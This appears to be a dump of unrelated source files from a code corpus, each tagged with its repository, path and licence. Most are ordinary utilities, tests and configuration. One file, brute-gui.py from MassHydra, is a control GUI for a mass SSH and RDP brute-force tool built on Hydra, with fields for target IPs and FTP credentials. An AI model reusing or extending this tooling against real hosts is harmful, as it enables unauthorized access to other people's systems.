git = gitlab.Gitlab(url=server_url, ssl_verify=validate_certs, email=login_user, password=login_password,
private_token=login_token, api_version=4)
git.auth()
except (gitlab.exceptions.GitlabAuthenticationError, gitlab.exceptions.GitlabGetError) as e:
module.fail_json(msg='Failed to connect to Gitlab server: %s' % to_native(e))
if group_path is None:
group_path = group_name.replace(" ", "_")
group = GitLabGroup(module, git)
group_exists = group.existsGroup(group_name)
if group_exists and state == "absent":
if group.deleteGroup():
module.exit_json(changed=True, result="Successfully deleted group %s" % group_name)
else:
if state == "absent":
module.exit_json(changed=False, result="Group deleted or does not exists")
else:
if group.createOrUpdateGroup(name=group_name, path=group_path, description=description):
module.exit_json(changed=True, result="Successfully created or updated the group %s" % group_name)
else:
module.exit_json(changed=False, result="No need to update the group %s" % group_name)
if __name__ == '__main__':
main()
|
satiros12/MassHydra
|
brute-gui.py
|
Python
|
mit
| 4,425
| 0.011299
|
import sys, psutil, subprocess, time
from PyQt4 import QtGui
global config
def kill(proc_pid):
try:
process = psutil.Process(proc_pid)
for proc in process.children(recursive=True):
proc.kill()
process.kill()
except Exception as e:
print "Can't kill process",proc_pid,e
def parseConfig():
global config
class Config(object):
pass
config = Config()
try:
with open("./config.py","r") as CR:
L = CR.readlines()
LL = filter(lambda x : x != "\n" and x[0] != "#", L)
LLL = map(lambda x : x.split("#")[0].split("\n")[0] , LL)
LLL = map(lambda x: x[:-1] if x[-1] == "\r" else x , LLL)
DL = dict([[l.split("=")[0],
("=".join(l.split("=")[1:])).split("\"")[1] if "\"" in ("=".join(l.split("=")[1:])) else ("=".join(l.split("=")[1:]))] for
l in LLL])
config.__dict__ = DL
except Exception as e:
print "[ERROR] Configurations parese incorrect"
return False
return True
class BruteGui(QtGui.QMainWindow):
def __init__(self):
super(BruteGui, self).__init__()
self.initUI()
self.id_server = "./id_server.exe"
self.id_process = None
def initUI(self):
#Layout
widget = QtGui.QWidget(self)
grid = QtGui.QGridLayout()
grid.setSpacing(10)
#Buttons
controlButtons = ["Load","Id","Start","Stop","Log"]
self.Buttons = []
for ib,cb in zip(range(len(controlButtons)),controlButtons):
self.Buttons.append(QtGui.QPushButton(cb))
self.Buttons[-1].clicked.connect(self.buttonPushed)
#if cb == "Log":
# self.Buttons[-1].setCheckable(True)
grid.addWidget(self.Buttons[-1],ib,3)
#Lines
inputLines = ["REFRESH:","ID IP:","HTTP IP:","FTP IP:","FTP USER:","FTP PASS:","FTP DIRECTORY:","SSH OPTS:","RDP OPTS:","MAX THREADS:"]
inputLinesV = ["control_updateTime", "ID_server", "server", "ftp_ip", "ftp_user", "ftp_pass",
"ftp_dir", "service_ssh", "service_rdp", "hydra_thread_limit"]
self.LableLines = []
for ib, cb, vcb in zip(range(len(inputLines)), inputLines, inputLinesV):
QLE = QtGui.QLineEdit()
QLE.setText(config.__dict__[vcb])
self.LableLines.append([vcb,(QtGui.QLabel(cb),QLE)])
grid.addWidget(self.LableLines[-1][1][0], ib,0)
grid.addWidget(self.LableLines[-1][1][1], ib,1)
self.LableLines = dict(self.LableLines)
widget.setLayout(grid)
self.setCentralWidget(widget)
self.statusBar()
self.setGeometry(500, 500, 500, 300)
self.setWindowTitle('Brute Massive Force : SSH+RDP ')
self.show()
def buttonPushed(self):
global config
sender = self.sender()
ts = sender.text()
#["Load", "Id", "Start", "Stop", "Log"]
if(ts == "Load"):
for l in self.LableLines:
config.__dict__[l] = str(self.LableLines[l][1].text())
with open("./config.py","w") as WF:
for c in config.__dict__:
WF.write(str(c) + "=\"" + config.__dict__[c] + "\"\n")
with open(config.server_control, "w") as WF:
WF.write("load")
elif(ts== "Id"):
if self.id_process != None:
kill(self.id_process.pid)
self.id_process = subprocess.Popen([self.id_server])
with open(config.server_control, "w") as WF:
WF.write("id")
elif(ts == "Start"):
with ope
|
n(config.server_control, "w") as WF:
WF.write("start")
elif(ts == "Stop"):
with open(config.server_control, "w") as WF:
WF.write("stop")
|
elif (ts == "Log"):
with open(config.server_control, "w") as WF:
WF.write("log")
time.sleep(float(config.control_updateTime))
self.statusBar().showMessage(sender.text())
def closeEvent(self, event):
if self.id_process != None:
kill(self.id_process.pid)
def main():
parseConfig()
#t_id_server = threading.Thread(target=id_server)
app = QtGui.QApplication(sys.argv)
ex = BruteGui()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
steveandroulakis/mytardis
|
tardis/tardis_portal/publish/publishservice.py
|
Python
|
bsd-3-clause
| 2,367
| 0.008872
|
class PublishService():
def __init__(self, providers, experiment):
self.rc_providers = providers
self.experiment = experiment
self.provider = self._get_provider()
def _get_provider(self):
from tardis.tardis_portal.publish.provider.rifcsprovider import RifCsProvider
if self.rc_providers:
from django.utils.importlib import import_module
for pmodule in self.rc_providers:
# Import the module
try:
|
module_name, klass_name = pmodule.rsplit('.', 1)
module = import_module(module_name)
except ImportError, e:
# TODO Show appropriate error msg
raise e
|
# Create the Instance
try:
provider_class = getattr(module, klass_name)
provider = provider_class()
except AttributeError, e:
# TODO Show appropriate error msg
raise e
# Retrieve the provider that can deal with the experiment
if provider and provider.is_schema_valid(self.experiment):
return provider
# Can't find a matching provider, return a default one
return RifCsProvider()
def get_context(self):
return self.provider.get_rifcs_context(self.experiment)
def manage_rifcs(self, oaipath):
if self.provider.can_publish(self.experiment):
self._write_rifcs_to_oai_dir(oaipath)
else:
self._remove_rifcs_from_oai_dir(oaipath)
def _remove_rifcs_from_oai_dir(self, oaipath):
import os
filename = os.path.join(oaipath, "MyTARDIS-%s.xml" % self.experiment.id)
if os.path.exists(filename):
os.remove(filename)
def _write_rifcs_to_oai_dir(self, oaipath):
from tardis.tardis_portal.xmlwriter import XMLWriter
xmlwriter = XMLWriter()
xmlwriter.write_template_to_dir(oaipath, "MyTARDIS-%s.xml" % self.experiment.id,
self.get_template(), self.get_context())
def get_template(self):
return self.provider.get_template(self.experiment)
|
katakumpo/nicepy
|
nicepy/__init__.py
|
Python
|
mit
| 122
| 0
|
from nicepy.assertions import *
from nicepy.decorators import *
from ni
|
cepy.shortcuts import *
from n
|
icepy.utils import *
|
coddingtonbear/python-myfitnesspal
|
myfitnesspal/__init__.py
|
Python
|
mit
| 128
| 0
|
from myfitnesspal.client import Client # noqa
__version__ = "1.16.6"
VERSIO
|
N = tuple(int(v) for v in __version__.split("
|
."))
|
idea4bsd/idea4bsd
|
python/helpers/py3only/docutils/parsers/rst/languages/fi.py
|
Python
|
apache-2.0
| 3,541
| 0.001412
|
# -*- coding: utf-8 -*-
# $Id: fi.py 7119 2011-09-02 13:00:23Z milde $
# Author: Asko Soukka <asko.soukka@iki.fi>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/language
|
s.
"""
Finnish-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
'huomio': 'attention',
'varo': 'caution',
'code (translation required)': 'code',
'vaara': 'danger',
|
'virhe': 'error',
'vihje': 'hint',
't\u00e4rke\u00e4\u00e4': 'important',
'huomautus': 'note',
'neuvo': 'tip',
'varoitus': 'warning',
'kehotus': 'admonition',
'sivupalkki': 'sidebar',
'aihe': 'topic',
'rivi': 'line-block',
'tasalevyinen': 'parsed-literal',
'ohje': 'rubric',
'epigraafi': 'epigraph',
'kohokohdat': 'highlights',
'lainaus': 'pull-quote',
'taulukko': 'table',
'csv-taulukko': 'csv-table',
'list-table (translation required)': 'list-table',
'compound (translation required)': 'compound',
'container (translation required)': 'container',
#u'kysymykset': u'questions',
'meta': 'meta',
'math (translation required)': 'math',
#u'kuvakartta': u'imagemap',
'kuva': 'image',
'kaavio': 'figure',
'sis\u00e4llyt\u00e4': 'include',
'raaka': 'raw',
'korvaa': 'replace',
'unicode': 'unicode',
'p\u00e4iv\u00e4ys': 'date',
'luokka': 'class',
'rooli': 'role',
'default-role (translation required)': 'default-role',
'title (translation required)': 'title',
'sis\u00e4llys': 'contents',
'kappale': 'sectnum',
'header (translation required)': 'header',
'footer (translation required)': 'footer',
#u'alaviitteet': u'footnotes',
#u'viitaukset': u'citations',
'target-notes (translation required)': 'target-notes'}
"""Finnish name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
'lyhennys': 'abbreviation',
'akronyymi': 'acronym',
'kirjainsana': 'acronym',
'code (translation required)': 'code',
'hakemisto': 'index',
'luettelo': 'index',
'alaindeksi': 'subscript',
'indeksi': 'subscript',
'yl\u00e4indeksi': 'superscript',
'title-reference (translation required)': 'title-reference',
'title (translation required)': 'title-reference',
'pep-reference (translation required)': 'pep-reference',
'rfc-reference (translation required)': 'rfc-reference',
'korostus': 'emphasis',
'vahvistus': 'strong',
'tasalevyinen': 'literal',
'math (translation required)': 'math',
'named-reference (translation required)': 'named-reference',
'anonymous-reference (translation required)': 'anonymous-reference',
'footnote-reference (translation required)': 'footnote-reference',
'citation-reference (translation required)': 'citation-reference',
'substitution-reference (translation required)': 'substitution-reference',
'kohde': 'target',
'uri-reference (translation required)': 'uri-reference',
'raw (translation required)': 'raw',}
"""Mapping of Finnish role names to canonical role names for interpreted text.
"""
|
aestrivex/bctpy
|
test/nbs_test.py
|
Python
|
gpl-3.0
| 779
| 0.001284
|
from .load_samples import load_sample_group_dsi, load_sample_group
|
_fmri, load_sample_group_qball
import numpy as np
import bct
def test_nbs_dsi_qbi():
q = load_sample_group_qball()
d = load_sample_group_dsi()
_nbs_helper(q, d, .5, atol=0.3)
def test_nbs_paired_dsi_qbi():
pass
def test_nbs_dsi_fmri():
d = load_sample_group_dsi()
f = load_sample_group_fmri()
assert f.shape == (219, 219, 8)
_nbs_helper(d, f, .03, atol=0.03)
def test_nbs_paired_dsi_fmri():
pass
def _nbs_helper(x, y, expected_pval, ato
|
l=.05, thresh=.1, ntrials=25,
paired=False):
# comment
pval, _, _ = bct.nbs_bct(x, y, thresh, k=ntrials, paired=paired)
print(pval, expected_pval)
assert np.allclose(pval, expected_pval, atol=atol)
|
CDSP/generate_zips
|
generate_zips.py
|
Python
|
gpl-3.0
| 5,314
| 0.026177
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Execution example : python generate_zips.py "path/to/folder/to/zip" "path/to/csv/inventory/file" "survey_name"
#
# Libs
#
import csv, logging, os, sys, zipfile, zlib
#
# Config
#
log_folder = 'log'
log_level = logging.DEBUG
ignored_extensions = ['jp2', 'j2k', 'jpf', 'jpx', 'jpm', 'mj2']
ignored_files = ['.DS_Store']
#
# Functions
#
# A file is a classification plan file if its name is "planclassement.pdf"
def is_classification_file(file) :
return file == 'planclassement.pdf'
# A file is a transcription file if its name contains "_transcr_"
def is_transcr_file(file) :
return any(x in file for x in ['_transcr_', '_trans_'])
# A file is an inventory if its file name contains "_add_archives_inventaire"
def is_inventory_file(file) :
return '_add_archives_inventaire' in file
# A file is an "enquête sur l'enquête" file if it is into folder "add/ese" and its extension is ".mp3", ".xml" or ".pdf"
def is_ese_file(root, extension) :
return os.path.join('add', 'ese') in root and extension.lower() in ['mp3', 'xml', 'pdf']
# A file is a meta file if its name is "meta_documents.csv" or "meta_speakers.csv"
def is_meta_file(file) :
return file in ['meta_documents.csv', 'meta_speakers.csv']
def add_file_to_archive(zf, root, path, file) :
zf.write(os.path.join(root, file), os.path.join(root.replace(path, ''), file))
def zipdir(path, zf_ol, zf_dl) :
# zf_ol and zf_dl are zipfile handle
for root, dirs, files in os.walk(path) :
for file in files :
logging.info('Add file into archive folder : ' + os.path.join(root, file))
extension = file.split('.')[-1]
file_without_extension = file.split('.')[0]
# Ignore all the JPEG2000 files
if not extension in ignored_extensions and not file in ignored_files :
# Transcription file
if is_transcr_file(file) :
# Add ODT and PDF transcription files into "download" archive folder
if extension.lower() in ['odt', 'pdf'] :
add_file_to_archive(zf_dl, root, path, file)
# Add XML transcription files into "online" archive folder
elif extension.lower() in ['xml'] :
add_file_to_archive(zf_ol, root, path, file)
# If file is an inventory, classification or "enquête sur l'enquête", add it to "donwload" and "online" archive folder
elif is_inventory_file(file) or is_classification_file(file) or is_ese_file(root, extension) :
add_file_to_archive(zf_dl, root, path, file)
add_file_to_archive(zf_ol, root, path, file)
# If file is a meta file, add it to "online" archive folder
elif is_meta_file(file) :
add_file_to_archive(zf_ol, root, path, file)
# For other files, check into the inventory file
elif file_without_extension in recordsbyid.keys() :
if recordsbyid[file_without_extension][21] != '' :
add_file_to_archive(zf_dl, root, path, file)
if recordsbyid[file_without_extension][22] != '' :
add_file_to_archive(zf_ol, root, path, file)
# Else do nothing
else :
logging.info('#ignored : file not added into "online" archive folder neither into "download" archive folder : ' + file)
#
# Main
#
if __name__ == '__main__' :
if len(sys.argv) <= 3 :
print ''
print 'Arguments error'
print 'Correct usage : python ' + sys.argv[0] + ' "path/to/folder/to/zip" "path/to/csv/inventory/file" "survey_name"'
print 'The first argument is mandatory and is the path to the folder to zip'
print 'The second argument is mandatory and is the path to the CSV inventory file'
print 'The third argument is not mandatory and is the name of the survey, this is used to name the archive folders'
else :
# Check that log folder exists, else create it
if not os.path.exists(log_folder) :
os.makedirs(log_folder)
# Create the archive folders names
survey_name = sys.argv[3] if len(sys.argv) == 4 else 'survey'
zip_online_folder_name = survey_name + '-ol.zip'
zip_download_folder_name = survey_name + '-dl.zip'
# Create log file
# log_file = log_folder +
|
path_separator + sys.argv[0].replace('.py', '.log')
log_file = os.path.join(log_folder, sys.argv[0].replace('.py', '.log'))
logging.basicConfig(filename = log_file, filemode = 'w', format = '%(asctime)s | %(levelname)s | %(message)s', datefmt = '%m/%d/%Y %I:%M:%S %p', level = log_level)
logging.info('Start')
# Parse inventory file
logging.info('Parse inventory file')
inventory_file = sys.argv[2]
rec
|
ordsbyid = {}
with open(inventory_file, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for x in spamreader :
if len(x) == 23 :
recordsbyid[x[1]] = x
# Create archive folder
zf_ol = zipfile.ZipFile(zip_online_folder_name, mode='w', compression=zipfile.ZIP_DEFLATED, allowZip64=1)
zf_dl = zipfile.ZipFile(zip_download_folder_name, mode='w', compression=zipfile.ZIP_DEFLATED, allowZip64=1)
logging.info('Create archive folders')
# Add files into archive folder
zipdir(sys.argv[1], zf_ol, zf_dl)
logging.info('Online folder zipped into file : ' + zip_online_folder_name)
logging.info('Download folder zipped into file : ' + zip_download_folder_name)
print ''
print 'Online folder zipped into file : ' + zip_online_folder_name
print 'Download folder zipped into file : ' + zip_download_folder_name
zf_ol.close()
zf_dl.close()
|
DxCx/nzbToMedia
|
nzbToGamez.py
|
Python
|
gpl-3.0
| 2,702
| 0.011843
|
#!/usr/bin/env python2
#
##############################################################################
### NZBGET POST-PROCESSING SCRIPT ###
# Post-Process to CouchPotato, SickBeard, NzbDrone, Mylar, Gamez, HeadPhones.
#
# This script sends the download to your automated media management servers.
#
# NOTE: This script requires Python to be installed on your system.
##############################################################################
#
### OPTIONS ###
## General
# Auto Update nzbToMedia (0, 1).
#
# Set to 1 if you want nzbToMedia to automatically check for and update to the latest version
#auto_update=0
# Safe Mode protection of DestDir (0, 1).
#
# Enable/Disable a safety check to ensure we don't process all downloads in the default_downloadDirectory by mistake.
#safe_mode=1
## Gamez
# Gamez script category.
#
# category that gets called for post-processing with Gamez.
#gzCategory=games
# Gamez api key.
#gzapikey=
# Gamez host.
#
# The ipaddress for your Gamez server. e.g For the Same system use localhost or 127.0.0.1
#gzhost=localhost
# Gamez port.
#gzport=8085
# Gamez uses ssl (0, 1).
#
# Set to 1 if using ssl, else set to 0.
#gzssl=0
# Gamez library
#
# move downloaded games here.
#gzlibrary
# Gamez web_root
#
# set this if using a reverse proxy.
#gzweb_root=
# Gamez watch directory.
#
# set this to where your Gamez completed downloads are.
#gzwatch_dir=
## Posix
# Niceness for external tasks Extractor and Transcoder.
#
# Set the Niceness value for the nice command. These range from -20 (most favorable to the process) to 19 (least favorable to the process).
#niceness=10
# ionice scheduling class (0, 1
|
, 2, 3).
#
# Set the ionice scheduling class. 0 for none, 1 for real time, 2 for best-effort, 3 for idle.
#ionice_class=2
# ionice scheduling class data.
#
# Set the ionice scheduling class data. This defines the class data, if the class accepts an argument. For real time and best-effort, 0-7 is valid data.
#ionice_classdata=4
## WakeOnLan
# use WOL (0, 1).
#
# set to 1 to send WOL broadcast to the mac and test the server (e.g. xbmc) on the host and port specified.
#wolwake=0
# WO
|
L MAC
#
# enter the mac address of the system to be woken.
#wolmac=00:01:2e:2D:64:e1
# Set the Host and Port of a server to verify system has woken.
#wolhost=192.168.1.37
#wolport=80
### NZBGET POST-PROCESSING SCRIPT ###
##############################################################################
import sys
import nzbToMedia
section = "Gamez"
result = nzbToMedia.main(sys.argv, section)
sys.exit(result)
|
gregvw/EPM-FCC-bulk
|
epm.py
|
Python
|
mit
| 4,240
| 0.020755
|
from __future__ import division
import itertools as it
import numpy as np
import scipy.linalg as sl
import matplotlib.pyplot as plt
import csv
import sys
from zdict import zdict
# hbar^2/2m in eV-Ang^2
hb2m0 = 3.807
# hcR_infty (eV per Rydberg)
Ry = 13.60569253
def mag2(V):
""" Return the magnitude squared of a tuple, list, or array """
return sum([v**2 for v in V])
class EPM(object):
def __init__(self,m,a0,VS,VA,bands):
self.a0 = a0
self.bands = bands
# Range of Fourier modes
d = range(-m,1+m)
# Construct all G-vectors in reciprocal lattice basis
G = [np.array((-i+j+k,i-j+k,i+j-k)) for i in d for j in d for k in d]
# Restrict to vectors of squared magnitude 12 or less
self.G = [g for g in G if mag2(g) < 13]
# Number of G vectors
ng = len(self.G)
# Assemble potential part of Hamiltonian
self.H = np.zeros((ng,ng),dtype=complex)
# Loop over all pairs of G vectors
for ii in range(ng):
for jj in range(ii,ng):
# Difference between two G vectors
dg = self.G[jj]-self.G[ii]
dgmag2 = mag2(dg)
# Dot product of dg and tau
theta = np.pi*sum(dg)/4
c = np.cos(theta)
s = np.sin(theta)
self.H[ii,jj] = (VS[dgmag2]*c-1j*VA[dgmag2]*s)*Ry
self.H[jj,ii] = self.H[ii,jj].conj()
def solve(self,k):
# Incorporate kinetic (main diagonal) part of Hamiltonian
kpg2 = np.array([mag2(k-g) for g in self.G])
kinetic = hb2m0*kpg2*(2*np.pi/self.a0)**2
# Insert diagonal elements
np.fill_diagonal(self.H,kinetic)
# Calculate eigenvalues of a Hermitian matrix
E = sl.eigvalsh(self.H)[:self.bands]
return E
if __name__ == '__main__':
# Name of semiconductor, e.g. Si, GaAs, InP, ZnS...
material = sys.argv[1]
reader = csv.reader(
|
open('form_factors.csv','r'),delimiter=',')
param = [[entry.split()[0] for entry in row] for row in reader]
# Store form factors in dictionaries
VS = zdict()
VA = zdict()
a0 = None
# Read form factors and lattice constant from file
row = [p[0] for p in param].index(material)
for i in range(1,len(param[0])):
exec(param[0][i] + '=' + param[row][i])
# Symmetry points in the FCC/Zincblende Brillouin zone
|
bz = {r'$\Gamma$':np.array((0,0,0)),
r'X':np.array((0,1,0)),
r'L':np.array((1/2,1/2,1/2)),
r'W':np.array((1/2,1,0)),
r'U':np.array((1/4,1,1/2)),
r'K':np.array((3/4,3/4,0))}
# Follow this path through the Brillouin zone to construct
# the band diagram
path = [r'L',r'$\Gamma$',r'X',r'W',r'K',r'$\Gamma$']
path_dex = range(len(path)-1)
# Highest Fourier mode to use
fmodes = 3
# Number of energy bands to compute
bands = 8
# Number of k-point along each path to evaluate
kpts = 40
# k-space path parametric variable
t = np.linspace(0,1,kpts)
# Construct solver object
epm = EPM(fmodes,a0,VS,VA,bands)
# Sequence of path directions in k-space
kdir = np.diff(np.vstack([bz[p] for p in path]),n=1,axis=0)
# Lengths of k-space path segments
path_length = [np.sqrt(mag2(k)) for k in kdir]
# Relative positions of k-space symmetry points along x axis
xticks = np.cumsum([0]+path_length)
x=np.hstack([xticks[i]*(1-t)+xticks[i+1]*t for i in path_dex])
# Parameterize path between two Brilluoin zone symmetry points
K = lambda d: (np.outer((1-t),bz[path[d]])+np.outer(t,bz[path[d+1]]))
# Compute eigenvalues along k-space path
E = np.vstack([np.vstack([epm.solve(k) for k in K(j)]) for j in path_dex])
Emin = np.min(E)-1
Emax = np.max(E)+1
# Display E-k diagram
fig = plt.figure(1,(10,6))
plt.plot(x,E,'r-',lw=2)
plt.xlim(x[0],x[-1])
plt.ylim(Emin,Emax)
plt.xticks(xticks,path,fontsize=20)
plt.ylabel('Energy (eV)',fontsize=20)
plt.title(material + ' bandstructure by EPM without S-O')
plt.vlines(xticks,Emin,Emax)
plt.show()
|
airbnb/streamalert
|
tests/unit/streamalert/apps/test_apps/test_aliyun.py
|
Python
|
apache-2.0
| 7,474
| 0.002141
|
"""
Copyright 2018-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import os
from mock import patch
from moto import mock_ssm
from nose.tools import assert_count_equal, assert_equal, assert_false, assert_true, raises
from aliyunsdkcore.acs_exception.exceptions import ServerException
from streamalert.apps._apps.aliyun import AliyunApp
from tests.unit.streamalert.apps.test_helpers import get_event, put_mock_params
from tests.unit.streamalert.shared.test_config import get_mock_lambda_context
@mock_ssm
class TestAliyunApp:
"""Test class for the AliyunApp"""
# pylint: disable=protected-access
@patch.dict(os.environ, {'AWS_DEFAULT_REGION': 'us-east-1'})
def setup(self):
"""Setup before each method"""
# pylint: disable=attribute-defined-outside-init
self._test_app_name = 'aliyun'
put_mock_params(self._test_app_name)
self._event = get_event(self._test_app_name)
self._context = get_mock_lambda_context(self._test_app_name, milliseconds=100000)
self._app = AliyunApp(self._event, self._context)
def test_sleep_seconds(self):
"""AliyunApp - Sleep Seconds"""
assert_equal(0, self._app._sleep_seconds())
def test_date_formatter(self):
"""AliyunApp - Date Formatter"""
assert_equal(self._app.date_formatter(), '%Y-%m-%dT%H:%M:%SZ')
def test_required_auth_info(self):
"""AliyunApp - Required Auth Info"""
assert_count_equal(list(self._app.required_auth_info().keys()),
{'access_key_id', 'access_key_secret', 'region_id'})
def test_region_validator_success(self):
"""AliyunApp - Region Validation, Success"""
validation_function = self._app.required_auth_info()['region_id']['format']
assert_equal(validation_function('ap-northeast-1'), 'ap-northeast-1')
def test_region_validator_failure(self):
"""AliyunApp - Region Validation, Failure"""
validation_function = self._app.required_auth_info()['region_id']['format']
assert_equal(validation_function('ap-northeast'), False)
@raises(ServerException)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
@patch('logging.Logger.exception')
def test_server_exception(self, log_mock, client_mock):
"""AliyunApp - Gather Logs, Exception"""
client_mock.side_effect = ServerException("error", "bad server response")
self._app._gather_logs()
log_mock.assert_called_with("%s error occurred", "Server")
def test_gather_logs_last_timestamp_set(self):
"""AliyunApp - Request Creation"""
assert_equal(self._app.request.get_StartTime(), '2018-07-23T15:42:11Z')
assert_equal(self._app.request.get_MaxResults(), AliyunApp._MAX_RESULTS)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_no_more_entries(self, client_mock):
"""AliyunApp - Gather Logs with no entries"""
client_mock.return_value = '{"RequestId":"B1DE97F8-5450-4593-AB38-FB61B799E91D",' \
'"Events":[],"EndTime":"2018-07-23T19:28:00Z",' \
'"StartTime":"2018-06-23T19:28:30Z"}'
logs = self._app._gather_logs()
assert_equal(0, len(logs))
assert_false(self._app._more_to_poll)
assert_equal("2018-07-23T19:28:00Z", self._app._last_timestamp)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_entries(self, client_mock):
"""AliyunApp - Gather Logs with some entries"""
client_mock.return_value = '{"NextToken":"20","RequestId":'\
'"B1DE97F8-5450-4593-AB38-FB61B799E91D",' \
'"Events":[{"eventTime":"123"},{"eventTime":"123"}],' \
'"EndTime":"2018-07-23T19:28:00Z",' \
'"StartTime":"2018-06-23T19:28:30Z"}'
logs = self._app._gather_logs()
assert_equal(2, len(logs))
assert_true(self._app._more_to_poll)
assert_equal(self._app.request.get_NextToken(), "20")
@patch('streamalert.apps.app_base.AppIntegration._invoke_successive_app')
@patch('streamalert.apps.batcher.Batcher._send_logs_to_lambda')
@patch('streamalert.apps._apps.aliyun.AliyunApp._sleep_seconds')
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_last_timestamp(self, client_mock, sleep_mock, batcher_mock, _):
"""AliyunApp - Test last_timestamp"""
# mock 3 responses
mock_resps = [
{
'NextToken': '50',
'RequestId': 'AAAAAAAA',
'Events': [
{
'eventTime': '2018-06-23T19:29:00Z'
},
{
'eventTime': '2018-06-23T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-2
|
3T19:28:30Z'
},
{
'NextTo
|
ken': '100',
'RequestId': 'BBBBBBBBB',
'Events': [
{
'eventTime': '2018-06-24T19:29:00Z'
},
{
'eventTime': '2018-06-24T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
},
{
'NextToken': '150',
'RequestId': 'CCCCCCCC',
'Events': [
{
'eventTime': '2018-06-25T19:29:00Z'
},
{
'eventTime': '2018-06-25T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
}
]
client_mock.side_effect = [json.dumps(r, separators=(',', ':')) for r in mock_resps]
# Mock remaining time. _sleep_seconds() methods will be called twice when
# make a call to gather logs via Aliyun API. Set sleep second to a large number
# to mimic corner case that there are still more logs to pull while lambda function
# timeout is reached. In this case, the _last_timestamp stamp should be updated
# correctly.
sleep_mock.side_effect = [0, 0, 0, 0, 1000000, 0]
# Mock 3 batcher call to invoke successive lambda function since there are more logs
batcher_mock.side_effect = [True, True, True]
self._app.gather()
assert_equal(self._app._poll_count, 3)
assert_true(self._app._more_to_poll)
assert_equal(self._app.request.get_NextToken(), "150")
assert_equal(self._app._last_timestamp, '2018-07-23T19:28:00Z')
|
mven/gonzo.py
|
gonzo.py
|
Python
|
mit
| 888
| 0.023649
|
# GONZO: A PYTHON SCRIPT TO RECORD PHP ERRORS INTO MONGO
# Michael Vendivel - vendivel@gmail.com
import subprocess
import datetime
from pymongo import MongoClient
# where's the log file
filename = '/path/to/php/logs.log'
# set up mongo client
client = MongoClient('mongo.server.address', 27017)
# w
|
hich DB
db = client.logs
# which Collection
php_logs = db.php_logs
# open a subprocess to tail (and follow) the log file
f = subprocess.Popen(['tail','-f',filename],\
stdout=subprocess.PIPE,stderr=subprocess.PIPE)
# continue to read the file and record lines into mongo
while True:
# read line by line
line = f.stdout.readline()
# compose the document to be inserted
post = {"line": line,
"created": datetime.datetime.utcnow()
}
|
# insert the document into the Collection
post_id = php_logs.insert(post)
# output the line for visual debugging (optional)
print line
|
Vito2015/pyextend
|
pyextend/core/thread/multiprocessTask.py
|
Python
|
gpl-2.0
| 6,887
| 0.001452
|
#!/usr/bin/env python
# coding: utf-8
"""
multiprocessTask.py
~~~~~~~~~~~~~~~~~~~
a multiprocess model of producer/consumer
task = Task(work_func, 1, 3, counter=0, a='', callback=cb)
results
|
= task.run()
for i in xrange(26):
lines = ["%d" % i] * random.randint(10, 20)
task.put(lines)
task.finish()
"""
import os
impor
|
t time
from multiprocessing import Pool as ProcessPool, Manager, cpu_count
__all__ = ['Producer', 'Consumer', 'Task']
class Callable(object):
def __call__(self, *args, **kwargs):
raise NotImplementedError('%s not callable' % self)
def run(self, *args, **kwargs):
raise NotImplementedError('%s.run() not implemented' % self)
class Producer(Callable):
def __init__(self, todo_list=None, max_qsize=None):
manager = Manager()
self._q = manager.Queue()
self._q_lock = manager.Lock()
self._q_close_event = manager.Event()
self._max_qsize = max_qsize or 0
todo_list = todo_list or []
if isinstance(todo_list, (list, tuple)) and len(todo_list) > 0:
self.put(todo_list)
super(Producer, self).__init__()
@property
def q_size(self):
return self._q.qsize()
def __call__(self, q, lock, close_event, *args, **kwargs):
for i, data in enumerate(self.run()):
with lock:
q.put(data)
print 'pid %s put %d: %s' % (os.getpid(), i, data)
def run(self):
while 1:
with self._q_lock:
if self._q.empty():
if self._q_close_event.is_set():
break
else:
time.sleep(0.01)
continue
yield self._q.get()
def put(self, *todos):
for todo in todos:
with self._q_lock:
self._q.put(todo)
def finish(self):
try:
self._q_close_event.set()
except Exception as e:
print e
class Consumer(Callable):
def __init__(self, fn=None):
self._fn = fn
self.results = []
super(Consumer, self).__init__()
def __call__(self, q, lock, close_event, *args, **kwargs):
while 1:
with lock:
if q.empty():
if close_event.is_set():
break
else:
time.sleep(0.01)
continue
data = q.get()
self.results.append(self.run(data, *args, **kwargs))
return self.results
def run(self, data, *args, **kwargs):
if self._fn:
return self._fn(data, *args, **kwargs)
class Task(object):
"""
a multiprocess model of producer/consumer
"""
def __init__(self, fn,
producer_count=None,
consumer_count=None,
callback=None,
batch=True,
counter=None,
**shared
):
"""
init producer/consumer task
Args:
fn: consumer called func(data, counter, q_size, *args, **shared_vars)
producer_count: producer process count, default: 1
consumer_count: consumer process count, default: cpu_count - 1
callback: callback func after f calling completed
batch: if True, `task.put(todo_list)` 'todo_list' will be do all at once in batches;
False, todo_list will be do one by one
counter: process shared counter, need custom imp in <fn>
**shared: process shared object data
"""
cpus = cpu_count()
if producer_count is None or producer_count < 1 or producer_count > cpu_count():
producer_count = 1
if consumer_count is None or consumer_count < 1 or consumer_count > cpu_count():
consumer_count = cpus - 1
print 'producer_count=%s consumer_count=%s' % (producer_count, consumer_count)
